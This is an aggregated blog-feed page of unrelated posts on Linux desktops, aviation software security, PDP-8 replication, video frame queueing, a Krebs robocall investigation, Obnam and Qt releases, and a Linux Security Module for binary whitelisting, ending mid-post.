Planet DebianJonathan Dowland: Coming in from the cold

I've been using a Mac day-to-day since around 2014, initially as a refreshing break from the disappointment I felt with GNOME3, but since then a few coincidences have kept me on the platform. Something happened earlier in the year that made me start to think about a move back to Linux on the desktop. My next work hardware refresh is due in March next year, which gives me about nine months to "un-plumb" myself from the Mac ecosystem. From the top of my head, here's the things I'm going to have to address:

  • the command modifier key (⌘). It's a small thing but its use on the Mac platform is very consistent, and since it's not used at all within terminals, there's never a clash between window management and terminal applications. Compared to the morass of modifier keys on Linux, I will miss it. It's possible if I settle on a desktop environment and spend some time configuring it I can get to a similarly comfortable place. Similarly, I'd like to stick to one clipboard, and if possible, ignore the select-to-copy, middle-click-to-paste one entirely. This may be an issue for older software.

  • The Mac hardware trackpad and gestures are honestly fantastic. I still have some residual muscle memory of using the Thinkpad trackpoint, and so I'm weaning myself off the trackpad by using an external thinkpad keyboard with the work Mac, and increasingly using a x61s where possible.

  • SizeUp. I wrote about this in useful mac programs. It's a window management helper that lets you use keyboard shortcuts to move and resize windows. I may need something similar, depending on what desktop environment I settle on. (I'm currently evaluating Awesome WM).

  • 1Password. These days I think a password manager is an essential piece of software, and 1Password is a very, very good example of one. There are several other options now, but sadly none that seem remotely as nice as 1Password. Ryan C Gordon wrote 1pass, a Linux-compatible tool to read a 1Password keychain, but it's quite raw and needs some love. By coincidence that's currently his focus, and one can support him in this work via his Patreon.

  • Font rendering. Both monospace and regular fonts look fantastic out of the box on a Mac, and it can be quite hard to switch back and forth between a Mac and Linux due to the difference in quality. I think this is a mixture of ensuring the font rendering software on Linux is configured properly, but also that I install a reasonable selection of fonts.

I think that's probably it: not a big list! Notably, I'm not locked into iTunes, which I avoid where possible; Apple's Photo app (formerly iPhoto) which is a bit of a disaster; nor Time Machine, which is excellent, but I have a backup system for other things in place that I can use.

CryptogramThe FAA Is Arguing for Security by Obscurity

In a proposed rule, the FAA argues that software in an Embraer S.A. Model ERJ 190-300 airplane is secure because it's proprietary:

In addition, the operating systems for current airplane systems are usually and historically proprietary. Therefore, they are not as susceptible to corruption from worms, viruses, and other malicious actions as are more-widely used commercial operating systems, such as Microsoft Windows, because access to the design details of these proprietary operating systems is limited to the system developer and airplane integrator. Some systems installed on the Embraer Model ERJ 190-300 airplane will use operating systems that are widely used and commercially available from third-party software suppliers. The security vulnerabilities of these operating systems may be more widely known than are the vulnerabilities of proprietary operating systems that the avionics manufacturers currently use.

Longtime readers will immediately recognize the "security by obscurity" argument. Its main problem is that it's fragile. The information is likely less obscure than you think, and even if it is truly obscure, once it's published you've just lost all your security.

This is me from 2014, 2004, and 2002.

The comment period for this proposed rule is ongoing. If you comment, please be polite -- they're more likely to listen to you.

Worse Than FailureCodeSOD: Plurals Dones Rights

Today, submitter Adam shows us how thoughtless language assumptions made by programmers are also hilarious language assumptions:

"So we're querying a database for data matching *title* but then need to try again with plural/singular if we didn't get anything. Removing the trailing S is bad, but what really caught my eye was how we make a word plural. Never mind any English rules or if the word is actually Greek, Chinese, or Klingon."


if ((locs == NULL || locs->Length() == 0) && (title->EndsWith(@"s") || title->EndsWith(@"S")))
{
    title->RemoveCharAt(title->Length()-1);
    locs = data->GetLocationsForWord(title);
}
else if ((locs == NULL || locs->Length() == 0) && title->Length() > 0)
{
    WCHAR c = title->CharAt(title->Length()-1);
    if (c >= 'A' && c <= 'Z')
    {
        title->Append(@"S");
    }
    else
    {
        title->Append(@"s");
    }
    locs = data->GetLocationsForWord(title);
}

Untils nexts times: ευχαριστώs &s 再见s, Hochs!

[Advertisement] Manage IT infrastructure as code across all environments with Puppet. Puppet Enterprise now offers more control and insight, with role-based access control, activity logging and all-new Puppet Apps. Start your free trial today!

Planet Linux AustraliaOpenSTEM: Guess the Artefact! – #2

Today’s Guess the Artefact! covers one of a set of artefacts which are often found confusing to recognise. We often get questions about these artefacts, from students and teachers alike, so here’s a chance to test your skills of observation. Remember – all heritage and archaeological material is covered by State or Federal legislation and should never be removed from its context. If possible, photograph the find in its context and then report it to your local museum or State Heritage body (the Dept of Environment and Heritage Protection in Qld; the Office of Environment and Heritage in NSW; the Dept of Environment, Planning and Sustainable Development in ACT; Heritage Victoria; the Dept of Environment, Water and Natural Resources in South Australia; the State Heritage Office in WA and the Heritage Council – Dept of Tourism and Culture in NT).

This artefact is made of stone. It measures about 12 x 8 x 3 cm. It fits easily and comfortably into an adult’s hand. The surface of the stone is mostly smooth and rounded, it looks a little like a river cobble. However, one side – the right-hand side in the photo above – is shaped so that 2 smooth sides meet in a straight, sharpish edge. Such formations do not occur on naturally rounded stones, which tells us that this was shaped by people and not just rounded in a river. The smoothed edges meeting in a sharp edge tell us that this is ground-stone technology. Ground stone technology is a technique used by people to create smooth, sharp edges on stones. People grind the stone against other rocks, occasionally using sand and water to facilitate the process, usually in a single direction. This forms a smooth surface which ends in a sharp edge.

Neolithic Axe

Ground stone technology is usually associated with the Neolithic period in Europe and Asia. In the northern hemisphere, this technology was primarily used by people who were learning to domesticate plants and animals. These early farmers learned to grind grains, such as wheat and barley, between two stones to make flour – thus breaking down the structure of the plant and making it easier to digest. Our modern mortar and pestle is a descendant of this process. Early farmers would have noticed that these actions produced smooth and sharp edges on the stones. These observations would have led them to apply this technique to other tools which they used and thus develop the ground-stone technology. Here (picture on right) we can see an Egyptian ground stone axe from the Neolithic period. The toolmaker has chosen an attractive red and white stone to make this axe-head.

In Japan this technology is much older than elsewhere in the northern hemisphere, and ground-stone axes have been found dating to 30,000 years ago during the Japanese Palaeolithic period. Until recently these were thought to be the oldest examples of ground-stone technology in the world. However, in 2016, Australian archaeologists Peter Hiscock, Sue O’Connor, Jane Balme and Tim Maloney reported in an article in the journal Australian Archaeology, the finding of a tiny flake of stone (just over 1 cm long and 1/2 cm wide) from a ground stone axe in layers dated to 44,000 to 49,000 years ago at the site of Carpenter’s Gap in the Kimberley region of north-west Australia. This tiny flake of stone – easily missed by anyone not paying close attention – is an excellent example of the extreme importance of ‘archaeological context’. Archaeological material that remains in its original context (known as in situ) can be dated accurately and associated with other material from the same layers, thus allowing us to understand more about the material. Anything removed from the context usually can not be dated and only very limited information can be learnt.

The find from the Kimberley makes Australia the oldest place in the world to have ground-stone technology. The tiny chip of stone, broken off a larger ground-stone artefact, probably an axe, was made by the ancestors of Aboriginal people in the millennia after they arrived on this continent. These early Australians did not practise agriculture, but they did eat various grains, which they learned to grind between stones to make flour. It is possible that whilst processing these grains they learned to grind stone tools as well. Our artefact, shown above, is undated. It was found, totally removed from its original context, stored under an old house in Brisbane. The artefact is useful as a teaching aid, allowing students to touch and hold a ground-stone axe made by Aboriginal people in Australia’s past. However, since it was removed from its original context at some point, we do not know how old it is, or even where it came from exactly.

Our artefact is a stone tool. Specifically, it is a ground stone axe, made using technology that dates back almost 50,000 years in Australia! These axes were usually made by rubbing a hard stone cobble against rocks by the side of a creek. Water from the creek was used as a lubricant, and often sand was added as an extra abrasive. The making of ground-stone axes often left long grooves in these rocks. These are called ‘grinding grooves’ and can still be found near some creeks in the landscape today, such as in Kuringai Chase National Park in Sydney. The ground-stone axes were usually hafted using sticks and lashings of plant fibre, to produce a tool that could be used for cutting vegetation or other uses. Other stone tools look different to the one shown above, especially those made by flaking stone; however, smooth stones should always be carefully examined in case they are also ground-stone artefacts and not just simple stones!

Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV Beginners July Meeting

Jul 15 2017 12:30
Jul 15 2017 16:30
Location: 
Infoxchange, 33 Elizabeth St. Richmond

Workshop to be announced.

There will also be the usual casual hands-on workshop, Linux installation, configuration and assistance and advice. Bring your laptop if you need help with a particular issue. This will now occur BEFORE the talks from 12:30 to 14:00. The talks will commence at 14:00 (2pm) so there is time for people to have lunch nearby.

The meeting will be held at Infoxchange, 33 Elizabeth St. Richmond 3121 (enter via the garage on Jonas St.) Late arrivals, please call (0421) 775 358 for access to the venue.

LUV would like to acknowledge Infoxchange for the venue.

Linux Users of Victoria Inc., is an incorporated association, registration number A0040056C.

July 15, 2017 - 12:30

Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV Main July 2017 Meeting

Jul 4 2017 18:30
Jul 4 2017 20:30
Location: 
The Dan O'Connell Hotel, 225 Canning Street, Carlton VIC 3053

PLEASE NOTE NEW LOCATION

Tuesday, July 4, 2017
6:30 PM to 8:30 PM
The Dan O'Connell Hotel
225 Canning Street, Carlton VIC 3053

Speakers:

• To be announced

Come have a drink with us and talk about Linux.  If you have something cool to show, please bring it along!

The Dan O'Connell Hotel, 225 Canning Street, Carlton VIC 3053

Food and drinks will be available on premises.

Before and/or after each meeting those who are interested are welcome to join other members for dinner.

Linux Users of Victoria Inc., is an incorporated association, registration number A0040056C.

July 4, 2017 - 18:30

Cory DoctorowAudio from my NYPL appearance with Edward Snowden


Last month, I appeared onstage with Edward Snowden at the NYPL, hosted by Paul Holdengraber, discussing my novel Walkaway. The library has just posted the audio! It was quite an evening.

,

Cory DoctorowBruce Sterling reviews WALKAWAY

Bruce Sterling, Locus Magazine: Walkaway is a real-deal, generically traditional science-fiction novel; it’s set in an undated future and it features weird set design, odd costumes, fights, romances, narrow escapes, cool weapons, even zeppelins. This is the best Cory Doctorow book ever. I don’t know if it’s destined to become an SF classic, mostly because it’s so advanced and different that it makes the whole genre look archaic.

For instance: in a normal science fiction novel, an author pals up with scientists and popularizes what the real experts are doing. Not here, though. Cory Doctorow is such an Internet policy wonk that he’s ‘‘popularizing’’ issues that only he has ever thought about. Walkaway is mostly about advancing and demolishing potential political arguments that have never been made by anybody but him…

…Walkaway is what science fiction can look like under modern cultural conditions. It’s ‘‘relevant,’’ it’s full of tremulous urgency, it’s Occupy gone exponential. It’s a novel of polarized culture-war in which all the combatants fast-talk past each other while occasionally getting slaughtered by drones. It makes Ed Snowden look like the first robin in spring.

…The sci-fi awesome and the authentically political rarely mix successfully. Cory had an SF brainwave and decided to exploit a cool plot element: people get uploaded into AIs. People often get killed horribly in Walkaway, and the notion that the grim victims of political struggle might get a silicon afterlife makes their fate more conceptually interesting. The concept’s handled brilliantly, too: these are the best portrayals of people-as-software that I’ve ever seen. They make previous disembodied AI brains look like glass jars from 1950s B-movies. That’s seductively interesting for a professional who wants to mutate the genre’s tropes, but it disturbs the book’s moral gravity. The concept makes death and suffering silly.

…I’m not worried about Cory’s literary fate. I’ve read a whole lot of science fiction novels. Few are so demanding and thought-provoking that I have to abandon the text and go for a long walk.

I won’t say there’s nothing else like Walkaway, because there have been some other books like it, but most of them started mass movements or attracted strange cults. There seems to be a whole lot of that activity going on nowadays. After this book, there’s gonna be more.

Planet DebianAndreas Bombe: PDP-8/e Replicated — Introduction

I am creating a replica of the DEC PDP-8/e architecture in an FPGA from schematics of the original hardware. So how did I end up with a project like this?

The story begins with me wanting to have a computer with one of those front panels that have many, many lights where you can really see, in real time, what the computer is doing while it is executing code. Not because I am nostalgic for a prior experience with any of those — I was born a bit too late for that and my first computer as a kid was a Commodore 64.

Now, the front panel era ended around 40 years ago with the advent of microprocessors, and computers of that age and older that are complete and working are hard to find and not cheap. And even if you find one, there’s the issue of weight, size (complete systems with peripherals fill at least a rack) and power consumption. So what to do — build myself a small one with modern technology of course.

While there are many computer architectures of that era to choose from, the various PDP machines by DEC are significant and well known (and documented) due to their large numbers. The most important are probably the 12 bit PDP-8, the 16 bit PDP-11 and the 36 bit PDP-10. While the PDP-11 is enticing because of the possibility of running UNIX, I wanted to start with something simpler, so I chose the PDP-8.

My implementation on display next to a real PDP-8/e at VCFe 18.0


The Original

DEC started the PDP-8 line of computers (Programmed Data Processors) as low cost machines in 1965. It is a quite minimalist 12 bit architecture based on the earlier PDP-5, and by minimalist I mean seriously minimal. If you are familiar with early 8 bit microprocessors like the 6502 or 8080, you will find them luxuriously equipped in comparison.

The PDP-8 base architecture has a program counter (PC) and an accumulator (AC)1. That’s it. There are no pointer or index registers2. There is no stack. It has addition and AND instructions but subtractions and OR operations have to be manually coded. The optional Extended Arithmetic Element adds the MQ register but that’s really it for visible registers. The Wikipedia page on the PDP-8 has a good detailed description.
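
As an illustration of how minimal that is: a subtraction has to be built from complement-and-increment followed by an add (CMA and IAC, then TAD, on the real machine). A sketch of that 12 bit arithmetic in Python (the helper is mine, not PDP-8 code):

```python
MASK = 0o7777  # 12 bits, in PDP-8-style octal


def sub12(a, b):
    """Compute (a - b) mod 2^12 the PDP-8 way: negate b, then add."""
    neg_b = (~b + 1) & MASK  # two's complement: complement (CMA), increment (IAC)
    return (a + neg_b) & MASK  # the add (TAD), truncated to 12 bits
```

For example, sub12(5, 3) gives 2, and sub12(0, 1) wraps around to 0o7777.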

Regarding technology, the PDP-8 series has been in production long enough to get the whole range of implementations from discrete transistor logic to microprocessors. The 8/e which I target was right in the middle, implemented in TTL logic where each IC contains multiple logic elements. This allowed the CPU itself (including timing generator) to fit on three large circuit boards plugged into a backplane. Complete systems would have at least another board for the front panel and multiple boards for the core memory, then additional boards for whatever options and peripherals were desired.

Design Choices and Comparisons

I’m not the only one who had the idea to build something like that, of course. Among the other modern PDP-8 implementations with a front panel, probably the most prominent project is the Spare Time Gizmos SBC6120, a PDP-8 single board computer built around the Harris/Intersil HD-6120 microprocessor (which implements the PDP-8 architecture), combined with a nice front panel. Another is the PiDP-8/I, a nice front panel (modeled after the 8/i, which has even more lights) driven by the simh simulator running under Linux on a Raspberry Pi.

My goal is to get front panel lights that appear exactly like the real ones in operation. This necessitates driving the lights at full speed, as they change with every instruction or even within instructions for some display selections. For example, if you run a tight loop that does nothing but increment AC while displaying that register, it would appear that all lights are lit at equal but less than full brightness. The reason is that the loop runs at such a high speed that even the most significant bit, which is blinking the slowest, is too fast to see flickering. Hence they are all effectively on 50% of the time, just at different frequencies, and appear to be constantly lit at the same brightness.
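
That 50% figure is easy to sanity-check with a tiny simulation (my sketch, unrelated to the FPGA code): count a register through one full cycle and measure how often each bit is set.

```python
def bit_duty_cycles(width=12):
    """Fraction of the time each bit of a free-running counter is lit."""
    total = 1 << width
    counts = [0] * width
    for value in range(total):
        for bit in range(width):
            if value & (1 << bit):
                counts[bit] += 1
    return [c / total for c in counts]
```

Every bit comes out at exactly 0.5; only the toggle frequency differs between the least and most significant bit.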

This is where the other projects lack what I am looking for. The PiDP-8/I has a multiplexed display which updates at something like 30 Hz or 60 Hz, taking whatever value is current in the simulation software at the time. All the states the lights took in between are lost, and consequently there is flickering where there shouldn’t be. On the SBC6120, at least the address lines appear to update at full speed, as these are the actual RAM address lines. However, the 6120 microprocessor used does not make the data required for the indicator display externally available. Instead, the SBC6120 runs an interrupt at 30 Hz to trap into its firmware/monitor program, which then reads the current state and writes it to the front panel display, which is essentially just another peripheral. Another considerable problem with the SBC6120 is its use of the 6100 microprocessor family ICs, which are themselves long out of production and not trivial (or cheap) to come by.

Given that the way to go is to drive all lights in step with every cycle3, this can be done either by software running on a dedicated microcontroller — which is how I started — or by implementing a real CPU with all the needed outputs in an FPGA — which is the project I am writing about.

In the next post I will give an overview of the hardware I built so far and some of the features that are yet to be implemented.


  1. With an associated link bit which is a little different from a carry bit in that it is treated as a thirteenth bit, i.e. it will be flipped rather than set when a carry occurs. [return]
  2. Although there are 8 specially treated memory addresses that will pre-increment when used in indirect addressing. [return]
  3. Basic cycles on the PDP-8/e are 1.4 µs for memory modifying cycles and fast cycles of 1.2 µs for everything else. Instructions can be one to three cycles long. [return]

Planet DebianSteinar H. Gunderson: Frame queue management in Nageru 1.6.1

Nageru 1.6.1 is on its way, and what was intended to be a release centered only around monitoring improvements (more specifically, a full set of native Prometheus metrics) actually ended up getting a fairly substantial change to how Nageru manages its frame queues. To understand what's changing and why, it's useful to first understand the history of Nageru's queue management. Nageru 1.0.0 started out with a fairly simple scheme, but with some basics that are still relevant today: One of the input cards was deemed the master card, and whenever it delivers a frame, the master clock ticks and an output frame is produced. (There are some subtleties about dropped frames and/or the master card changing frame rates, but I'm going to ignore them, since they're not important to the discussion.)

To this end, every card keeps a preallocated frame queue; when a card delivers a frame, it's put into the queue, and when the master clock ticks, it tries picking out one frame from each of the other cards' queues to mix together. Note that “mix” here could be as simple as picking one input and throwing all the other ones away; the queueing algorithm doesn't care, it just feeds all of them to the theme and lets that run whatever GPU code it needs to match the user's preferences.

The only thing that really keeps the queues bounded is that the frames in them are preallocated (in GPU memory), so if one queue gets longer than 16 frames, Nageru starts dropping frames from it. But is 16 the right number? There are two conflicting demands here, ignoring memory usage:

  • You want to keep the latency down.
  • You don't want to run out of frames in the queue if you can avoid it; if you drop too aggressively, you could find yourself at the next frame with nothing in the queue, because the input card hasn't delivered it yet when the master card ticks. (You could argue one should delay the output in this case, but for how long? And if you're using HDMI/SDI output, you have no such luxury.)

The 1.0.0 scheme does about as well as one could possibly hope in never dropping frames, but unfortunately, it can be pretty poor at latency. For instance, if your master card runs at 50 Hz and you have a 60 Hz card, the latter will eventually build up a delay of 16 * 16.7 ms = 266.7 ms—clearly unacceptable, and rather unneeded.

You could ask the user to specify a queue length, but the user probably doesn't know, and also shouldn't really have to care—more knobs to twiddle are a bad thing, and even more so knobs the user is expected to twiddle. Thus, Nageru 1.2.0 introduced queue autotuning; it keeps a running estimate on how big the queue needs to be to avoid underruns, simply based on experience. If we've been dropping frames on a queue and then there's an underrun, the “safe queue length” is increased by one, and if the queue has been having excess frames for more than a thousand successive master clock ticks, we reduce it by one again. Whenever the queue has more than this “safe” number, we drop frames.
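
A sketch of that heuristic (my own paraphrase in code; the names and starting value are mine, not Nageru's actual implementation):

```python
class QueueAutotuner:
    """1.2.0-style autotuning: grow the safe length on underruns,
    shrink it after a long stretch of consistently excess frames."""

    def __init__(self, safe_len=1, excess_limit=1000):
        self.safe_len = safe_len          # current "safe queue length" estimate
        self.excess_limit = excess_limit  # ~1000 successive master clock ticks
        self.excess_ticks = 0

    def on_underrun(self):
        # We dropped too aggressively; give the queue one more frame of slack.
        self.safe_len += 1
        self.excess_ticks = 0

    def frames_to_drop(self, queue_len):
        # Called on every master clock tick with the current queue length.
        if queue_len > self.safe_len:
            self.excess_ticks += 1
            if self.excess_ticks > self.excess_limit:
                self.safe_len = max(1, self.safe_len - 1)
                self.excess_ticks = 0
        else:
            self.excess_ticks = 0
        return max(0, queue_len - self.safe_len)
```

After an underrun the tuner tolerates one more queued frame; anything beyond the safe length is reported as droppable.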

This was simple, effective and largely fixed the problem. However, when adding metrics, I noticed a peculiar effect: Not all of my devices have equally good clocks. In particular, when setting up for 1080p50, my output card's internal clock (which assumes the role of the master clock when using HDMI/SDI output) seems to tick at about 49.9998 Hz, and my simple home camcorder delivers frames at about 49.9995 Hz. Over the course of an hour, this means it produces one more frame than you should have… which should of course be dropped. Having an SDI setup with synchronized clocks (blackburst/tri-level) would of course fix this problem, but most people are not so lucky with their cameras, not to mention the price of PC graphics cards with SDI outputs!

However, this happens very slowly, which means that for a significant amount of time, the two clocks will very nearly be in sync, and thus racing. Who ticks first is determined largely by luck in the jitter (normal is maybe 1ms, but occasionally, you'll see delayed delivery of as much as 10 ms), and this means that the “1000 frames” estimate is likely to be thrown off, and the result is hundreds of dropped frames and underruns in that period. Once the clocks have diverged enough again, you're off the hook, but again, this isn't a good place to be.

Thus, Nageru 1.6.1 changes the algorithm yet again, by incorporating more data to build an explicit jitter model. 1.5.0 was already timestamping each frame to be able to measure end-to-end latency precisely (now also exposed in Prometheus metrics), but from 1.6.1, these timestamps are actually used in the queueing algorithm. I ran several eight- to twelve-hour tests and simply stored all the event arrivals to a file, and then simulated a few different algorithms (including the old algorithm) to see how they fared in measures such as latency and number of drops/underruns.

I won't go into the full details of the new queueing algorithm (see the commit if you're interested), but the gist is: Based on the last 5000 frames, it tries to estimate the maximum possible jitter for each input (ie., how late the frame could possibly be). Based on this as well as clock offsets, it determines whether it's really sure that there will be an input frame available on the next master tick even if it drops the queue, and then trims the queue to fit.

The result is pretty satisfying; here's the end-to-end latency of my camera being sent through to the SDI output:

As you can see, the latency goes up, up, up until Nageru figures it's now safe to drop a frame, and then does it in one clean drop event; no more hundreds of drops involved. There are very late frame arrivals involved in this run—two extra frame drops, to be precise—but the algorithm simply determines immediately that they are outliers, and drops them without letting them linger in the queue. (Immediate dropping is usually preferred to sticking around for a bit and then dropping it later, as it means you only get one disturbance event in your stream as opposed to two. Of course, you can only do it if you're reasonably sure it won't lead to more underruns later.)

Nageru 1.6.1 will ship before Solskogen, as I intend to run it there :-) And there will probably be lovely premade Grafana dashboards from the Prometheus data. Although it would have been a lot nicer if Grafana were more packaging-friendly, so I could pick it up from stock Debian and run it on armhf. Hrmf. :-)

Krebs on SecurityGot Robocalled? Don’t Get Mad; Get Busy.

Several times a week my cell phone receives the telephonic equivalent of spam: A robocall. On each occasion the call seems to come from a local number, but when I answer there is that telltale pause followed by an automated voice pitching some product or service. So when I heard from a reader who chose to hang on the line and see where one of these robocalls led him, I decided to dig deeper. This is the story of that investigation. Hopefully, it will inspire readers to do their own digging and help bury this annoying and intrusive practice.

The reader, Cedric (he asked to keep his last name out of this story), had grown increasingly aggravated with the calls as well, until one day he opted to play along by telling a white lie to the automated voice response system that called him: Yes, he said, yes he definitely was interested in credit repair services.

“I lied about my name and played like I needed credit repair to buy a home,” Cedric said. “I eventually wound up speaking with a representative at creditfix.com.”

The number that called Cedric — 314-754-0123 — was not in service when Cedric tried calling it back, suggesting it had been spoofed to make it look like it was coming from his local area. However, pivoting off of creditfix.com opened up some useful avenues of investigation.

Creditfix is hosted on a server at the Internet address 208.95.62.8. According to records maintained by Farsight Security — a company that tracks which Internet addresses correspond to which domain names — that server hosts or recently hosted dozens of other Web sites (the full list is here).

Most of these domains appear tied to various credit repair services owned or run by a guy named Michael LaSala and registered to a mail drop in Las Vegas. Looking closer at who owns the 208.95.62.8 address, we find it is registered to System Admin, LLC, a Florida company that lists LaSala as a manager, according to a lookup at the Florida Secretary of State’s office.

An Internet search for the company’s address turns up a filing by System Admin LLC with the U.S. Federal Communications Commission (FCC). That filing shows that the CEO of System Admin is Martin Toha, an entrepreneur probably best known for founding voip.com, a voice-over-IP (VOIP) service that allows customers to make telephone calls over the Internet.

Emails to the contact address at Creditfix.com elicited a response from a Sean in Creditfix’s compliance department. Sean told KrebsOnSecurity that mine was the second complaint his company had received about robocalls. Sean said he was convinced that his employer was scammed by a lead generation company that is using robocalls to quickly and illegally gin up referrals, which generate commissions for the lead generation firm.

Creditfix said the robocall leads it received appear to have been referred by Little Brook Media, a marketing firm in New York City. Little Brook Media did not respond to multiple requests for comment.

Robocalls are permitted for political candidates, but beyond that if the recording is a sales message and you haven’t given your written permission to get calls from the company on the other end, the call is illegal. According to the Federal Trade Commission (FTC), companies are using auto-dialers to send out thousands of phone calls every minute for an incredibly low cost.

“The companies that use this technology don’t bother to screen for numbers on the national Do Not Call Registry,” the FTC notes in an advisory on its site. “If a company doesn’t care about obeying the law, you can be sure they’re trying to scam you.”

Mr. Toha confirmed that Creditfix was one of his clients, but said none of his clients want leads from robocalls for that very reason. Toha said the problem is that many companies buy marketing leads but don’t always know where those leads come from or how they are procured.

“A lot of times clients don’t know the companies that the ad agency or marketing agency works with,” Toha said. “You submit yourself as a publisher to a network of publishers, and what they do is provide calls to marketers.”

Robby Birnbaum is a debt relief attorney in Florida and president of the National Association of Credit Services Organizations. Birnbaum said no company wants to buy leads from robocalls, and that marketers who fabricate leads this way are not in business for long.

But he said those that end up buying leads from robocall marketers are often smaller mom-and-pop debt relief shops, and that these companies soon find themselves being sued by what Birnbaum called “frequent filers,” lawyers who make a living suing companies for violating laws against robocalls.

“It’s been a problem in this industry for a while, but robocalls affect every single business that wants to reach consumers,” Birnbaum said. He noted that the best practice is for companies to require lead generators to append to each customer file information about how and from where the lead was generated.

“A lot of these lead companies will not provide that, and when my clients insist on it, those companies have plenty of other customers who will buy those leads,” Birnbaum said. “The phone companies can block many of these robocalls, but they don’t.”

That may be about to change. The FCC recently approved new rules that would let phone companies block robocallers from using numbers they aren’t supposed to be using.

“If a robocaller decides to spoof another phone number — making it appear that they’re calling from a different line to hide their identity — phone providers would be able to block them if they use a number that clearly can’t exist because it hasn’t been assigned or that an existing subscriber has asked not to have spoofed,” reads a story at The Verge.

The FCC estimates that there are more than 2.4 billion robocalls made every month, or roughly seven calls per person per month. The FTC received nearly 3.5 million robocall complaints in fiscal year 2016, an increase of 60 percent from the year prior.

The newest trend in robocalls is the “ringless voicemail,” in which the marketing pitch lands directly in your voicemail inbox without ringing the phone. The FCC also is considering new rules to prohibit ringless voicemails.

Readers may be able to avoid some marketing calls by registering their mobile number with the Do Not Call registry, but the list appears to do little to deter robocallers. If and when you do receive robocalls, consider reporting them to the FTC.

Some wireless providers now offer additional services and features to help block automated calls. For example, AT&T offers wireless customers its free Call Protect app, which screens incoming calls and flags those that are likely spam calls. See the FCC’s robocall resource page for links to resources at your mobile provider.

In addition, there are a number of third-party mobile apps designed to block spammy calls, such as Nomorobo and TrueCaller.

Update, June 27, 2017, 3:04 p.m. ET: Corrected spelling of Michael LaSala.

Planet DebianLars Wirzenius: Obnam 1.22 released (backup application)

I've just released version 1.22 of Obnam, my backup application. It is the first release for this year. Packages are available on code.liw.fi/debian and in Debian unstable, and source is in git. A summary of the user-visible changes is below.

For those interested in living dangerously and accidentally on purpose deleting all their data, the link below shows the status and roadmap for FORMAT GREEN ALBATROSS: http://distix.obnam.org/obnam-dev/182bd772889544d5867e1a0ce4e76652.html

Version 1.22, released 2017-06-25

  • Lars Wirzenius made Obnam log the full text of an Obnam exception/error message with more than one line. In particular this applies to encryption error messages, which now log the gpg output.

  • Lars Wirzenius made obnam restore require absolute paths for files to be restored.

  • Lars Wirzenius made obnam forget use a little less memory. The amount depends on the number of generations and the chunks they refer to.

  • Jan Niggemann updated the German translation of the Obnam manual to match recent changes in the English version.

  • SanskritFritz and Ian Cambell fixed the kdirstat plugin.

  • Lars Wirzenius changed Obnam to hide a Python stack trace when there's a problem with the SSH connection (e.g., failure to authenticate, or existing connection breaks).

  • Lars Wirzenius made the Green Albatross version of obnam forget actually free chunks that are no longer used.

Planet DebianShirish Agarwal: Dreams don’t cost a penny, mumma’s boy :)

This one I promise will be short 🙂

After the last two updates, I thought it was time for something positive to share. While I’m doing the hard work (physiotherapy, which is gruelling), the only luxury I have nowadays is falling into dreams, which are also rare. The dream I’m going to share is totally unrealistic, as my mum hates travel, but I’m sure many sons and daughters would identify with it. Almost all her travel outside of visiting relatives has been because I dragged her into it.

In the dream, I am going to a Debconf: I get a bursary, and the conference is being held somewhere in Europe, maybe Paris (2019 probably) 🙂 . I reach and attend the conference, present, and generally have a great time sharing and learning from my peers. As we all do in these uncertain times, I too phone home every couple of days, assuring her that I’m well and in the best of health. The weather is mild like it was in South Africa, and this time I had come packed with woollens, so all was well.

Just the day before the conference is to end, I call up mum and she tells about a specific hotel/hostel which I should check out. I am somewhat surprised that she knows of a specific hotel/hostel in a specific place but I accede to her request. I go there to find a small, quiet, quaint bed & breakfast place (dunno if Paris has such kind of places), something which my mum would like. Intuitively, I ask at the reception to look in the register. After seeing my passport, he too accedes to my request and shows me the logbook of all visitors registering to come in the last few days (for some reason privacy is not a concern then) . I am surprised to find my mother’s name in the register and she had turned up just a day or two before.

I again request the reception to be able to go to room abcd without being announced and to have some sort of key (with maintenance or laundry as an excuse). The reception calls the manager, and after looking at copies of my mother’s passport and mine, they somehow accede to the request, with help located nearby just in case something goes wrong.

I disguise my voice and announce as either Room service or Maintenance and we are both surprised and elated to see each other. After talking a while, I go back to the reception and register myself as her guest.

The next week is a whirlwind as I come to know of a hop-on, hop-off bus service in Paris similar to the one in South Africa. I buy a small booklet and we go through all the museums, the vineyards, or whatever it is that Paris has to offer. IIRC there is also a lock and key on a famous bridge. We also do that. She is constantly surprised at the different activities the city shows her, and the mother-son bond becomes much better.

I had shared the same dream with her and she laughed. In reality, she is happy and comfortable in the confines of her home.

Still I hope some mother-daughter, son-father, son-mother or any combination of parent, sibling takes this entry and enrich each other by travelling together.


Filed under: Miscellenous Tagged: #dream, #mother, #planet-debian, travel

,

Planet DebianLisandro Damián Nicanor Pérez Meyer: Qt 5.7 submodules that didn't make it to Stretch but will be in testing

There are two Qt 5.7 submodules that we could not package in time for Stretch but are/will be available in their 5.7 versions in testing. These are qtdeclarative-render2d-plugin and qtvirtualkeyboard.

declarative-render2d-plugin makes use of the Raster paint engine instead of OpenGL to render the contents of a scene graph, thus making it useful when Qt Quick 2 applications are run on a system without OpenGL 2-enabled hardware. Using it might require tweaking Debian's /etc/X11/Xsession.d/90qt5-opengl. On Qt 5.9 and newer this plugin is merged into Qt GUI, so there should be no need to perform any action on the user's behalf.

Debian's VirtualKeyboard currently has a gotcha: we are not building it with the embedded code it ships. Upstream ships 3rd party code but lacks a way to detect and use the system versions of it. See QTBUG-59594; patches are welcome. Please note that we prefer patches sent directly upstream to the current dev revision; we will be happy to backport patches if necessary.
Yes, this means no hunspell, openwnn, pinyin, tcime nor lipi-toolkit/t9write support.


Planet DebianSteve Kemp: Linux security modules, round two.

So recently I wrote a Linux Security Module (LSM) which would deny execution of commands, unless an extended attribute existed upon the filesystem belonging to the executables.

The whitelist-LSM worked well, but it soon became apparent that it was a little pointless. Most security changes are pointless unless you define what you're defending against - your "threat model".

In my case it was written largely as a learning experience, but also because I figured it could be useful. However it wasn't actually that useful, because you soon realize that you have to whitelist too much:

  • The redis-server binary must be executable, to the redis-user, otherwise it won't run.
  • /usr/bin/git must be executable to the git user.

In short there comes a point where user alice must run executable blah. If alice can run it, then so can mallory. At which point you realize the exercise is not so useful.

Taking a step back, I realized that what I wanted to prevent was the execution of unknown/unexpected and malicious binaries. How do you identify known-good binaries? Well, hashes & checksums are good. So for my second attempt I figured I'd not look for a mere "flag" on a binary, but instead look for a valid hash.

Now my second LSM is invoked for every binary that is executed by a user:

